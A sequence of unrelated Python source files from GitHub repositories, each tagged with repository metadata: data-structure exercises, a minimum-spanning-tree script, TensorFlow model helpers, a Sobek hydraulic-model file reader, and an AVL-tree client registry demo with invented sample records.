np.set_printoptions(threshold=np.nan)
class Config:
__instance = None
def __new__(cls, *args, **kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls, *args, **kwargs)
return cls.__instance
def __init__(self):
print('Init Config!', os.getpid())
# 文件路径相关参数
self.rootPath = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
self.ZZ800_DATA = self.rootPath + '/data/800_data.csv'
self.ZZ800_RAW_DATA = self.rootPath + '/data/800_raw_data.csv'
self.ZZ800_CODES = self.rootPath + '/data/800_codes.csv'
self.ZZ800_RM_VR_FFT = self.rootPath + '/data/800_rm_vr_fft.csv'
self.MARKET_RATIO = self.rootPath + '/data/index_ratio.csv'
self.TRAINING_DAY = self.rootPath + '/data/trading_day.csv'
# self.speed_method = 'value_ratio_fft_euclidean' # for 沪深300指数预测
self.speed_method = 'rm_market_vr_fft' # for 沪深800选股
self.update_start = '2018-05-18' # 更新数据的开始时间(数据库日期的最后一天的下一天)
self.update_end = '2018-05-21' # 更新数据的结束时间(这一天也会被更新下来)
self.auto_update = False # 回测时是否自动更新数据
self.plot_simi_stock = False # 是否画出相似股票
# self.is_regression_test = False # 是回测还是预测
# self.start_date = pd.to_datetime('2018-05-16') #回测的开始时间。 比如'2018-01-01',则从'2018-01-02'开始做预测
# self.regression_days = 5
self.is_regression_test = True
self.start_date = pd.to_datetime('2011-01-01')
self.regression_days = 800
self.regression_end_date = self.start_date + timedelta(days=self.regression_days) # 回测结束时间
# 相似性查找参数
self.pattern_length = 30
self.nb_similar_make_prediction = 20 # avergae them as a pred
self.nb_similar_of_all_similar = 4000 # 从所有股票的相似票中选择top N
self.nb_similar_of_each_stock = 200
self.slide_window = 1500
self.weighted_dist = True
self.weight_a = 1
self.weight_b = 2
self.alpha = np.multiply([1, 1, 1, 1, 1], 40)
self.beata = np.multiply([1, 1, 1, 1, 1], math.pi / 180)
self.fft_level = 5
self.similarity_method = 'euclidean' # or 'pearsonr'
self.cores = 20
self.nb_codes = 800
# 输出文件地址
name = str(self.start_date.date()) + '_' + str(self.speed_method) + '_' + str(self.nb_similar_make_prediction)
self.PEARSON_CORR_RESLUT = self.rootPath + '/output/corr' + name + '.csv'
self.PRDT_AND_ACT_RESULT = self.rootPath + '/output/pred' + name +'.csv'
self.regression_result = self.rootPath + '/pic/para_' + name + '.png'
config = Config()
if __name__ == '__main__':
std_data = pd.read_csv(config.DATA)
| cheersyouran/simi-search | codes/config.py | config.py | py | 3,162 | python | en | code | 10 | github-code | 36 |
6084442031 | # Binary Tree
class Node:
def __init__(self, data):
self.data = data
self.left = None
self.right = None
def insert(self, data):
# check if tree is null
if self.data:
# check 2 conditions: self.data > data or < data
if self.data > data:
if self.left is None:
self.left = Node(data)
else:
self.left.insert(data)
elif self.data < data:
if self.right is None:
self.right = Node(data)
else:
self.right.insert(data)
else:
self.data = data
def print(self):
if self.left:
self.left.print()
print(self.data)
if self.right:
self.right.print()
# inorder
def inorder(self, root):
res = []
if root:
res = self.inorder(root.left)
res.append(root.data)
res += self.inorder(root.right)
return res
# preorder
def preorder(self, root):
res = []
if root:
res.append(root.data)
res += self.preorder(root.left)
res += self.preorder(root.right)
return res
# postorder
def postorder(self, root):
res = []
if root:
res = self.postorder(root.left)
res += self.postorder(root.right)
res.append(root.data)
return res
# Full Binary Tree: a node that has 0 or 2 children
def isFullBinaryTree(self, root):
if root is None:
return True
if root.left is None and root.right is None:
return True
if root.left is not None and root.right is not None:
return self.isFullBinaryTree(root.left) and self.isFullBinaryTree(root.right)
return False
def depth(self, root):
d = 0
while root:
d += 1
root = root.left
return d
def bfs_tree(self, root, res):
print('data: ',root.data)
if root is None:
return
if root.left or root.right:
if root.left:
res.append(root.left.data)
if root.right:
res.append(root.right.data)
if root.left:
res = self.bfs_tree(root.left, res)
if root.right:
res = self.bfs_tree(root.right, res)
return res
# A Perfect Binary Tree: a tree that has both left and right children from every node from every level, and leaf nodes should be in the same level.
# depth: O(ln(n)) where n is # of nodes
# # of nodes: = 2^(h+1) - 1
# leaf nodes: 2^h
def isPerfectBinaryTree(self, root, d, level=0):
# base case: if root is null
if root is None:
return True
print('d: ', d)
if root.left is None and root.right is None:
return (d == level + 1)
# only 1 child is None
if root.left is None or root.right is None:
return False
return self.isPerfectBinaryTree(root.left, d, level + 1) and self.isPerfectBinaryTree(root.right, d, level + 1)
# count # of nodes
def countNodes(self, root):
if root is None:
return 0
return 1 + self.countNodes(root.left) + self.countNodes(root.right)
# Complete Binary Tree: all nodes leaning towards the left
def isCompleteBinaryTree(self, root, index, num_nodes):
if root is None:
return True
if index >= num_nodes:
return False
return self.isCompleteBinaryTree(root.left, 2 * index + 1, num_nodes) and self.isCompleteBinaryTree(root.right, 2 * index + 2, num_nodes)
def isBalancedBinaryTree(self, root, height):
if root is None:
return True
left_height = Height()
right_height = Height()
l = self.isBalancedBinaryTree(root.left, left_height)
r = self.isBalancedBinaryTree(root.right, right_height)
# update current root node's height
height.height = max(left_height.height, right_height.height) + 1
if abs(left_height.height - right_height.height) <= 1:
return l and r
return False
class Height:
def __init__(self):
self.height = 0
def MinimalTree(array):
tree = Node(array[len(array) // 2])
for element in array:
tree.insert(element)
return tree
# List of Depths - can do bfs
class LLNode:
def __init__(self,data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def add(self, data):
node = LLNode(data)
node.next = self.head
self.head = node
def addToEnd(self, data):
node = LLNode(data)
if self.head is None:
node.next = self.head
self.head = node
current = self.head
while current.next:
current = current.next
node.next = current.next
current.next = node
def createLevelLL(root, lists, level):
if root is None:
return
linked_list = None
if len(lists) == level: # if level is not contained in list
linked_list = LinkedList()
lists.append(linked_list)
else:
linked_list = lists[level]
linked_list.add(root)
createLevelLL(root.left, lists, level + 1)
createLevelLL(root.right, lists, level + 1)
def list_of_depth(root):
lists = []
createLevelLL(root, lists, 0)
return lists
array = [3,5,6,9,10,13]
minimal_tree = MinimalTree(array)
minimal_tree.print()
print(minimal_tree.preorder(minimal_tree))
print(minimal_tree.postorder(minimal_tree))
print(minimal_tree.inorder(minimal_tree))
# tree = Node(10)
# tree.insert(3)
# tree.insert(4)
# tree.insert(12)
# tree.insert(13)
# tree.print()
# print(tree.inorder(tree))
# print(tree.preorder(tree))
# print(tree.postorder(tree))
# print(tree.isFullBinaryTree(tree))
root = Node(2)
root.insert(1)
root.insert(3)
root.left.print()
root.right.print()
# root.left.left = Node(4)
# root.left.right = Node(5)
# root.right.left = Node(6)
# root.right.right = Node(7)
if root.isCompleteBinaryTree(root, 0, root.countNodes(root)):
print('The tree is a complete binary tree')
if (root.isPerfectBinaryTree(root, root.depth(root))):
print("The tree is a perfect binary tree")
else:
print("The tree is not a perfect binary tree")
height = Height()
root = Node(1)
root.left = Node(2)
root.right = Node(3)
root.left.left = Node(4)
root.left.right = Node(5)
root.left.right.left = Node(6)
root.left.right.right = Node(7)
root.right.left = Node(8)
root.right.right = Node(9)
lists = list_of_depth(root)
for list in lists:
current = list.head
while current:
print(current.data.data)
current = current.next
print()
if root.isBalancedBinaryTree(root, height):
print('The tree is balanced')
else:
print('The tree is not balanced') | phuclinh9802/data_structures_algorithms | chapter 4/tree/tree.py | tree.py | py | 7,056 | python | en | code | 0 | github-code | 36 |
71408403945 | """ The simple neural model definitions. """
from __future__ import absolute_import, division, print_function
import numpy as np
import tensorflow as tf
def neural_net(x, layers, keep_prob, weight_decay):
y = tf.contrib.layers.flatten(x)
embedding_layer = None
for i, layer in enumerate(layers[:-1]):
y = tf.contrib.layers.fully_connected(y, layer,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(weight_decay))
embedding_layer = y
y = tf.nn.relu(y)
y = tf.nn.dropout(y, keep_prob=keep_prob)
return tf.contrib.layers.fully_connected(y, layers[-1],
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(weight_decay)), \
embedding_layer
def conv_net(x, convs, fullys, keep_prob, weight_decay):
y = x
for conv in convs:
y = tf.contrib.layers.conv2d(y, conv[0], kernel_size=[conv[1], conv[1]], stride=[1, 1], padding='SAME',
weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(),
weights_regularizer=tf.contrib.layers.l2_regularizer(weight_decay),
activation_fn=tf.nn.relu)
y = tf.contrib.layers.max_pool2d(y, kernel_size=[2, 2], padding='SAME')
y = tf.reshape(y, [-1, np.prod(y.get_shape().as_list()[1:])])
return neural_net(y, fullys, keep_prob, weight_decay)
| b3nk4n/tensorflow-handwriting-demo | tensorflow/models.py | models.py | py | 1,678 | python | en | code | 0 | github-code | 36 |
12573596280 | def reversewords(s):
container = []
s = s.split(" ")
z = ""
for x in s:
container.append(x)
container = container[::-1]
for x in range(0,len(container)):
z += str(container[x])
z += " "
return z
print(reversewords("Hello this is max"))
| AG-Systems/programming-problems | other/reversewordsinstring.py | reversewordsinstring.py | py | 289 | python | en | code | 10 | github-code | 36 |
32688598523 | """
DjikistraAlgorithm
"""
import math
from random import randint
class DjikistraAlgorithm():
"""
class DjikistraAlgorithm
create minimum spanning tree path
"""
def __init__(self):
self.matrix=[]
self.vertex=''
self.num_vertices=self.input_vertex()
self.create_matrix()
def create_matrix(self):
'''
method - create adjacency matrix - represantation of graph
'''
self.matrix=[[randint(0,15) if row!=column else 0 for column in range(0,self.num_vertices)]for row in range(0,self.num_vertices)]
#customization values in matrix
for row in range(0,self.num_vertices):
for column in range(0,self.num_vertices):
self.matrix[column][row]=self.matrix[row][column]
#if one vertices has not edges, create new matrix again
for array in self.matrix:
if any(array)<1:
self.create_matrix()
def display_matrix(self):
"""
method - display matrix
"""
for nums in self.matrix:
print(nums)
def input_vertex(self):
"""
method - input number of vertices
"""
while self.vertex not in range(0,10):
self.vertex=int(input("Choose number of vertices in range[0,10]: "))
return self.vertex
def start_minimum_spanning_tree(self):
"""
method - create minimum spanning tree
"""
#create list of vertices, only first vertex is active
selected_vector=[False if x!=0 else True for x in range(0,self.num_vertices)]
weight=0
connections_between_vertices=0
#if there are less connections between vertices than number vertices-1,perform operations
while connections_between_vertices<self.num_vertices-1:
index_of_row_minimum_value=0
index_of_column_minimum_value=0
minimum=math.inf
for row in range(0,self.num_vertices):
if selected_vector[row]:
for column in range(0,self.num_vertices):
if (self.matrix[row][column]>0 and not selected_vector[column]):
if self.matrix[row][column]<minimum:
minimum=self.matrix[row][column]
index_of_row_minimum_value=row
index_of_column_minimum_value=column
#if value of edges is chosen,we change the value on 0
self.matrix[index_of_row_minimum_value][index_of_column_minimum_value]=0
self.matrix[index_of_column_minimum_value][index_of_row_minimum_value]=0
#added minimum value to weight
weight+=minimum
#we activate vector which is bound by edge which we selected
selected_vector[index_of_column_minimum_value]=True
#added minimum value to edges next vector which was selected
for value in range(0,self.num_vertices):
if self.matrix[index_of_column_minimum_value][value]!=0:
self.matrix[index_of_column_minimum_value][value]+=minimum
print(f"Edge ({index_of_row_minimum_value}-{index_of_column_minimum_value}) and weight of edge={minimum}. All weight of edges={weight}")
selected_vector[index_of_column_minimum_value]=True
#added minimum value to weight vertices which are selected
connections_between_vertices+=1
print(f'Minimum spanning tree weight={weight}')
def __main__():
djkistra=DjikistraAlgorithm()
djkistra.display_matrix()
djkistra.start_minimum_spanning_tree()
if __name__=="__main__":
__main__()
| bl94/djikistra_algorithm | djikistra_algorithm.py | djikistra_algorithm.py | py | 3,716 | python | en | code | 0 | github-code | 36 |
73200838504 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 14:15:46 2019
@author: danie
"""
import geopandas as gpd
import pandas as pd
from shapely.geometry import LineString, Point
import os
import re
import numpy as np
import hkvsobekpy as his
import csv
#%%
def __between(value, a, b):
# Find and validate before-part.
pos_a = value.find(a)
if pos_a == -1:
return ""
# Find and validate after part.
pos_b = value.rfind(b)
if pos_b == -1:
return ""
# Return middle part.
adjusted_pos_a = pos_a + len(a)
if adjusted_pos_a >= pos_b:
return ""
return value[adjusted_pos_a:pos_b]
def __split_line(lineString, point, buffer=False):
if not buffer:
pointIntersect = point
else:
pointIntersect = point.buffer(buffer)
coords = lineString.coords
j = None
for i in range(len(coords) - 1):
if LineString(coords[i : i + 2]).intersects(pointIntersect):
j = i
break
assert j is not None
# Make sure to always include the point in the first group
return (
coords[: j + 1] + [Point(point).coords[0]],
[Point(point).coords[0]] + coords[j + 1 :],
)
__friction_models = {
"0": "chezy",
"1": "manning",
"2": "strickler (kn)",
"3": "strickler (ks)",
"4": "white-colebrook",
"7": "bos and bijkerk",
}
__flow_boundary_types = {"0": "waterlevel", "1": "discharge"}
__structure_types = {"6": "weir", "7": "orifice", "9": "pump"}
__structure_flow_dirs = {"0": "both", "1": "positive", "2": "negative", "3": "no_flow"}
__pump_control = {"1": "suction", "2": "delivery", "3": "both_sides"}
__control_types = {"0": "time", "1": "hydraulic", "2": "interval", "3": "PID"}
__control_param = {
"0": "crest_level",
"1": "crest_width",
"2": "gate_height",
"3": "pump_capacity",
}
__profile_types = {}
__match_num = "[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?"
# %% read network
def network(path, crs):
"""Read al network-files."""
links = gpd.GeoDataFrame(
columns=["ID", "FROM_NODE", "TO_NODE", "geometry"], geometry="geometry"
)
nodes = gpd.GeoDataFrame(columns=["ID", "geometry"], geometry="geometry")
with open(os.path.join(path, "network.tp"), "r") as networkTP:
for line in networkTP.readlines():
if line[0:4] == "NODE":
ident = __between(line, "id '", "' nm")
x = float(__between(line, "px ", " py"))
y = float(__between(line, "py ", " node"))
nodes = nodes.append(
{"ID": ident, "geometry": Point(x, y)}, ignore_index=True
)
elif line[0:4] == "BRCH":
ident = __between(line, "id '", "' nm")
from_node = __between(line, "bn '", "' en")
to_node = __between(line, "en '", "' al")
links = links.append(
{"ID": ident, "FROM_NODE": from_node, "TO_NODE": to_node},
ignore_index=True,
)
# open network.cp to define channel geometry
with open(os.path.join(path, "network.cp"), "r") as networkCP:
for reach in networkCP.read().split("BRCH")[1:]:
ident = __between(reach, "id '", "' cp")
cps = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
from_node = list(links.loc[links["ID"] == ident, "FROM_NODE"])[0]
to_node = list(links.loc[links["ID"] == ident, "TO_NODE"])[0]
coord_list = list(
list(nodes.loc[nodes["ID"] == from_node].geometry)[0].coords
)
sumDistance = 0.0
for idx, cp in enumerate(cps):
distance, angle = cp.split()
distance = (float(distance) - sumDistance) * 2
angle = np.deg2rad(90 - float(angle))
x = coord_list[-1][0] + float(distance) * np.cos(angle)
y = coord_list[-1][1] + float(distance) * np.sin(angle)
coord_list += [(x, y)]
sumDistance += distance
coord_list[-1] = list(
list(nodes.loc[nodes["ID"] == to_node].geometry)[0].coords
)[0]
index = links.loc[links["ID"] == ident].index[0]
links.at[index, "geometry"] = LineString(coord_list)
network = {}
objects = gpd.GeoDataFrame(
columns=["ID", "TYPE", "LINK", "LINK_POS", "geometry"],
geometry="geometry",
crs=crs,
)
objects_list = []
with open(os.path.join(path, "network.ntw"), "r") as networkNTW:
doLinks = True
for idx, l in enumerate(
csv.reader(
networkNTW.readlines(),
quotechar='"',
delimiter=",",
quoting=csv.QUOTE_ALL,
)
):
if idx > 0:
if doLinks:
if l[0] == "*":
doLinks = False
if doLinks:
network.update(
{
l[0]: {
"properties": {
"type": l[4],
"customType": l[5],
"startNode": l[14],
"endNode": l[27],
},
"lineString": [
[float(l[21]), float(l[22])],
[float(l[34]), float(l[35])],
],
}
}
)
if not l[14] in objects_list:
objects_list.append(l[14])
objects = objects.append(
{
"ID": l[14],
"NAME": l[15],
"TYPE": l[19],
"geometry": Point([float(l[21]), float(l[22])]),
},
ignore_index=True,
)
if not l[27] in objects_list:
objects_list.append(l[27])
objects = objects.append(
{
"ID": l[27],
"NAME": l[28],
"TYPE": l[32],
"geometry": Point([float(l[34]), float(l[35])]),
},
ignore_index=True,
)
h_points = gpd.GeoDataFrame(
columns=["ID", "geometry"], geometry="geometry", crs=crs
)
v_links = gpd.GeoDataFrame(
columns=["ID", "TYPE", "CUSTOM_TYPE", "FROM_NODE", "TO_NODE", "geometry"],
geometry="geometry",
crs=crs,
)
with open(os.path.join(path, "network.gr"), "r") as networkGR:
hLocations = his.read_his.ReadMetadata(
os.path.join(path, "calcpnt.his"), hia_file="auto"
).GetLocations()
for reach in networkGR.read().split("GRID")[1:]:
ident = __between(reach, "id '", "' ci")
line = list(links.loc[links["ID"] == ident, "geometry"])[0]
gridTable = __between(reach, "TBLE\n", " <\ntble").split(" <\n")
for idx, grid in enumerate(gridTable):
grid = grid.split()
h_point = grid[3].replace("'", "")
if h_point in hLocations: # check if point is ignored by Sobek-core
point = (float(grid[5]), float(grid[6]))
if h_point not in list(h_points["ID"]):
h_points = h_points.append(
{"ID": h_point, "geometry": Point(point)}, ignore_index=True
)
if idx == 0:
v_point = grid[4].replace("'", "")
Type = network[v_point]["properties"]["type"]
customType = network[v_point]["properties"]["customType"]
pointFrom = h_point
else:
pointTo = h_point
segment, line = __split_line(
LineString(line), Point(point), buffer=0.01
)
v_links = v_links.append(
{
"ID": v_point,
"TYPE": Type,
"CUSTOM_TYPE": customType,
"FROM_NODE": pointFrom,
"TO_NODE": pointTo,
"geometry": LineString(segment),
},
ignore_index=True,
)
v_point = grid[4].replace("'", "")
pointFrom = h_point
# use ID as index
for df in [links, nodes, objects, v_links]:
df.index = df["ID"]
with open(os.path.join(path, "network.cr"), "r") as networkCR:
for line in networkCR:
if re.match("CRSN", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) crsn", line).group(1)
)
with open(os.path.join(path, "network.st"), "r") as networkST:
for line in networkST:
if re.match("STRU", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) stru", line).group(1)
)
with open(os.path.join(path, "network.cn"), "r") as networkCN:
for line in networkCN:
if re.match("FLBX", line):
object_id = re.search(".id '(.*)' nm.", line).group(1)
objects.loc[object_id, "LINK"] = re.search(".ci '(.*)' lc", line).group(
1
)
objects.loc[object_id, "LINK_POS"] = float(
re.search(".lc (.*) flbx", line).group(1)
)
return {
"links": links.set_crs(crs, inplace=True),
"nodes": nodes.set_crs(crs, inplace=True),
"objects": objects.set_crs(crs, inplace=True),
"segments": v_links.set_crs(crs, inplace=True),
}
def results(path):
"""Read meta-data from his-files."""
files = {
"links": "reachseg.his",
"points": "calcpnt.his",
"structures": "struc.his",
}
result = {"links": None, "points": None, "structures": None}
for key, item in files.items():
if os.path.exists(os.path.join(path, item)):
meta_data = his.read_his.ReadMetadata(
os.path.join(path, item), hia_file="auto"
)
parameters = meta_data.GetParameters()
locations = meta_data.GetLocations()
result.update(
{
key: {
"df": meta_data.DataFrame(),
"parameters": parameters,
"locations": locations,
}
}
)
return result
def parameters(path):
"""Read parameters from a sobek case."""
result = dict()
with path.joinpath("friction.dat").open() as friction_dat:
result["friction"] = dict()
for line in friction_dat:
if re.match(".*BDFR.*", line):
model = __friction_models[__between(line, 'mf', ' mt').replace(' ', '')]
value = float(__between(line, 'mt cp 0', '0 mr').replace(' ', ''))
result['friction']['global'] = {'model': model,
'value': value}
with path.joinpath('struct.dat').open() as struct_dat:
structures = dict()
for line in struct_dat:
if re.match("STRU", line):
struc_id = re.search(".id '(.*)' nm.", line).group(1)
structures[struc_id] = {}
structures[struc_id]["def_id"] = re.search(
".dd '(.*)' ca.", line
).group(1)
structures[struc_id]["control_id"] = re.search(
"cj '(.*)' ", line
).group(1)
structures[struc_id]["control_active"] = bool(
int(re.search(f"ca ({__match_num}) ", line).group(1))
)
result["structures"] = structures
with path.joinpath("struct.def").open() as struct_def:
for stds in struct_def.read().split("stds"):
if "STDS" in stds:
def_id = re.search(".id '(.*)' nm.", stds).group(1)
struc_def = dict()
struc_def["type"] = __structure_types[
re.search(".ty ([0-9]).", stds).group(1)
]
if struc_def["type"] in ["weir", "orifice"]:
struc_def["crest_level"] = float(
re.search(f".cl ({__match_num}).", stds).group(1)
)
struc_def["crest_width"] = float(
re.search(f".cw ({__match_num}).", stds).group(1)
)
struc_def["flow_dir"] = __structure_flow_dirs[
re.search(f".rt ({__match_num}).", stds).group(1)
]
if struc_def["type"] == "weir":
cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
ce = float(re.search(f".ce ({__match_num}).", stds).group(1))
struc_def["coefficient"] = ce * cw
if struc_def["type"] == "orifice":
cw = float(re.search(f".sc ({__match_num}).", stds).group(1))
mu = float(re.search(f".mu ({__match_num}).", stds).group(1))
struc_def["coefficient"] = mu * cw
elif struc_def["type"] == "pump":
struc_def["control_side"] = __pump_control[
re.search(f".dn ({__match_num}).", stds).group(1)
]
stages = (
re.search(".*\nTBLE\n(.*)<\ntble.", stds).group(1).split("<")
)
stages = [stage.split() for stage in stages]
struc_def["pump_stages"] = [
{
"capacity": float(stage[0]),
"suction_on": float(stage[1]),
"suction_off": float(stage[2]),
"delivery_on": float(stage[3]),
"delivery_off": float(stage[4]),
}
for stage in stages
]
struc_id = next(
(
st_id
for st_id, values in structures.items()
if values["def_id"] == def_id
),
None,
)
if struc_id:
result["structures"][struc_id] = {
**result["structures"][struc_id],
**struc_def,
}
else:
print(f"structure definition {def_id} not linked to structure-id")
with path.joinpath("profile.dat").open() as profile_dat:
cross_sections = dict()
for line in profile_dat:
if re.match("CRSN", line):
xs_id = re.search(".id '(.*)' di.", line).group(1)
cross_sections[xs_id] = re.search(".di '(.*)' rl.", line).group(1)
result["cross_sections"] = cross_sections.copy()
with path.joinpath("profile.def").open() as profile_dat:
for crds in profile_dat.read().split("crds"):
if "CRDS" in crds:
def_id = re.search(".id '(.*)' nm.", crds).group(1)
xs_type = re.search(f".ty ({__match_num}).", crds).group(1)
crds = crds.replace("\n", "")
coords = re.search(r".*TBLE(.*)<tble.", crds).group(1).split("<")
if xs_type == "0":
z = np.array([float(coord.split()[0]) for coord in coords])
w = np.array([float(coord.split()[1]) for coord in coords])
series = pd.Series(
data=np.concatenate([np.flip(z), z]),
index=np.concatenate([np.flip(-w / 2), w / 2]),
)
else:
print(f"ERROR: structure type {xs_type} not supported!")
prof_ids = [
xs_id
for xs_id, xs_def in cross_sections.items()
if xs_def == def_id
]
if prof_ids:
for prof_id in prof_ids:
result["cross_sections"][prof_id] = series.copy()
else:
print(f"profile definition {def_id} not linked to profile-id")
return result
def control(path):
"""Read controls from a sobek case."""
result = dict()
with path.joinpath("control.def").open() as control_def:
for cntl in control_def.read().split("cntl"):
if "CNTL" in cntl:
cntl_def = {}
def_id = re.search(".id '(.*)' nm.", cntl).group(1)
cntl_def["type"] = __control_types[
re.search(f".ct ({__match_num}).", cntl).group(1)
]
cntl_def["parameter"] = __control_param[
re.search(f".ca ({__match_num}).", cntl).group(1)
]
if cntl_def["type"] == "PID":
cntl_def["min_value"] = float(
re.search(f".ui ({__match_num}) ", cntl).group(1)
)
cntl_def["max_value"] = float(
re.search(f".ua ({__match_num}) ", cntl).group(1)
)
elif cntl_def["type"] == "time":
crest_levels = []
for cntl_line in cntl.splitlines():
if "<" in cntl_line:
crest_levels.append(float(cntl_line.split(" ")[1]))
if len(crest_levels) > 0:
cntl_def["min_value"] = np.min(crest_levels)
cntl_def["max_value"] = np.max(crest_levels)
tble_str = cntl.replace("\n", "")
if "TBLE" in tble_str:
cntl_def["table"] = {}
tbl_props = re.findall("PDIN (.*) pdin", tble_str)
if len(tbl_props) > 0:
tbl_props = tbl_props[0].split()
cntl_def["table"]["function"] = tbl_props[0]
cntl_def["table"]["use_periodicity"] = bool(int(tbl_props[1]))
if cntl_def["table"]["use_periodicity"] == "1":
cntl_def["table"]["periodicity"] = tbl_props[2]
tble_list = (
re.search(r".*TBLE(.*)<tble.", tble_str).group(1).split("<")
)
date_time = [
pd.to_datetime(row.split()[0], format="'%Y/%m/%d;%H:%M:%S'")
for row in tble_list
]
values = [float(row.split()[1]) for row in tble_list]
cntl_def["table"]["data"] = pd.Series(data=values, index=date_time)
result[def_id] = cntl_def
return result
def boundaries(path):
"""Read boundaries from a sobek case."""
result = dict()
with path.joinpath("boundary.dat").open() as boundary_dat:
result["flow"] = dict()
for line in boundary_dat:
if re.match("FLBO", line):
ident = __between(line, "id", "st").replace(" ", "").replace("'", "")
result["flow"][ident] = {
"TYPE": __flow_boundary_types[
re.search(".ty ([0-9]).", line).group(1)
]
}
result["flow"] = pd.DataFrame.from_dict(result["flow"], orient="index")
return result
| d2hydro/sobek_kisters | sobek/read.py | read.py | py | 20,927 | python | en | code | 0 | github-code | 36 |
16076269490 | from cliente import Cliente
from AVL_tree import AVLTree
from merge_sort import merge
if __name__ == "__main__":
tree = AVLTree()
clientes = [
Cliente("João Silva", "1990-05-15", "123-4567", "joao@gmail.com", "Rua A, Bairro X, Cidade Y", "11111111111"),
Cliente("Maria Santos", "1985-08-20", "987-6543", "maria@yahoo.com", "Rua B, Bairro Z, Cidade X",
"22222222222"),
Cliente("Pedro Oliveira", "1982-03-10", "555-1234", "pedro@hotmail.com", "Rua C, Bairro Y, Cidade Z",
"33333333333"),
Cliente("Ana Pereira", "1995-11-25", "333-9999", "ana@outlook.com", "Rua D, Bairro W, Cidade V", "44444444444"),
Cliente("Luiz Costa", "1988-07-02", "222-5678", "luiz@gmail.com", "Rua E, Bairro V, Cidade U", "55555555555"),
Cliente("Laura Rodrigues", "1983-12-30", "777-9876", "laura@yahoo.com", "Rua F, Bairro U, Cidade T",
"66666666666"),
Cliente("Carlos Alves", "1998-09-05", "888-4321", "carlos@hotmail.com", "Rua G, Bairro T, Cidade S",
"77777777777"),
Cliente("Fernanda Nunes", "1980-02-14", "111-1111", "fernanda@outlook.com", "Rua H, Bairro S, Cidade R",
"88888888888"),
Cliente("Rafael Lima", "1987-06-18", "666-7890", "rafael@gmail.com", "Rua I, Bairro R, Cidade Q",
"99999999999"),
Cliente("Mariana Silva", "1993-04-28", "444-2345", "mariana@yahoo.com", "Rua J, Bairro Q, Cidade P",
"10101010101"),
Cliente("Lucas Santos", "1989-10-11", "555-8765", "lucas@hotmail.com", "Rua K, Bairro P, Cidade O",
"11111111112"),
Cliente("Isabela Oliveira", "1991-07-07", "777-5432", "isabela@outlook.com", "Rua L, Bairro O, Cidade N",
"12121212121"),
Cliente("Gustavo Pereira", "1984-01-03", "222-4321", "gustavo@gmail.com", "Rua M, Bairro N, Cidade M",
"13131313131"),
Cliente("Camila Ferreira", "1997-08-16", "999-1111", "camila@yahoo.com", "Rua N, Bairro M, Cidade L",
"14141414141"),
Cliente("Thiago Costa", "1994-03-22", "444-5678", "thiago@hotmail.com", "Rua O, Bairro L, Cidade K",
"15151515151"),
Cliente("Julia Rodrigues", "1986-12-09", "555-4321", "julia@outlook.com", "Rua P, Bairro K, Cidade J",
"16161616161"),
Cliente("Roberto Alves", "1981-05-27", "333-3456", "roberto@gmail.com", "Rua Q, Bairro J, Cidade I",
"17171717171"),
Cliente("Renata Nunes", "1996-02-02", "777-2222", "renata@yahoo.com", "Rua R, Bairro I, Cidade H",
"18181818181"),
Cliente("Marcos Lima", "1992-11-14", "222-6789", "marcos@hotmail.com", "Rua S, Bairro H, Cidade G",
"19191919191"),
Cliente("Aline Silva", "1983-07-26", "888-9876", "aline@outlook.com", "Rua T, Bairro G, Cidade F",
"20202020202"),
]
print("Todos os clientes cadastrados:")
for i, cliente in enumerate(clientes, start=1):
print(f"\nCliente {i}:")
print(cliente)
tree.insert(cliente)
print("\n===============================================================\n")
print("Fatores de balanceamento da árvore:")
all_balance_factor = tree.get_all_balance_factors()
for balance_factor in all_balance_factor:
print(f"{balance_factor}\n")
print("\n===============================================================\n")
print("Clientes em ordem alfabética:")
tree_arr = tree.inorder_traversal()
merge(tree_arr, 0, len(tree_arr) - 1)
for element in tree_arr:
print(f"{element}\n")
print("\n===============================================================\n")
print("Buscando Clientes por CPF:")
print("\nCPF '22222222222':")
cpf_busca = "22222222222"
resultado_busca, comparacoes = tree.search(cpf_busca)
if resultado_busca is not None:
encontrado = resultado_busca
print(f"\nCliente encontrado: {encontrado.nome}")
print(f"Comparação necessária para encontrar: {len(comparacoes)}")
print("Comparações feitas durante a busca:")
for i, cpf_comparacao in enumerate(comparacoes):
print(f"Comparação {i + 1}: {cpf_comparacao}")
else:
print(f"\nCliente com CPF {cpf_busca} não encontrado.")
print("\nCPF '10101010101':")
cpf_busca = "10101010101"
resultado_busca, comparacoes = tree.search(cpf_busca)
if resultado_busca is not None:
encontrado = resultado_busca
print(f"\nCliente encontrado: {encontrado.nome}")
print(f"Comparação necessária para encontrar: {len(comparacoes)}")
print("Comparações feitas durante a busca:")
for i, cpf_comparacao in enumerate(comparacoes):
print(f"Comparação {i + 1}: {cpf_comparacao}")
else:
print(f"\nCliente com CPF {cpf_busca} não encontrado.")
print("\nCPF '99999999999':")
cpf_busca = "99999999999"
resultado_busca, comparacoes = tree.search(cpf_busca)
if resultado_busca is not None:
encontrado = resultado_busca
print(f"\nCliente encontrado: {encontrado.nome}")
print(f"Comparação necessária para encontrar: {len(comparacoes)}")
print("Comparações feitas durante a busca:")
for i, cpf_comparacao in enumerate(comparacoes):
print(f"Comparação {i + 1}: {cpf_comparacao}")
else:
print(f"\nCliente com CPF {cpf_busca} não encontrado.")
print("\n===============================================================\n")
print("Buscando Clientes por email")
print("\nEmail 'rafael@gmail.com':")
email_busca = "rafael@gmail.com"
encontrado_pelo_email = {"cliente": None, "index": None}
for i, cliente in enumerate(clientes, start=0):
if cliente.email == email_busca:
encontrado_pelo_email["cliente"] = cliente
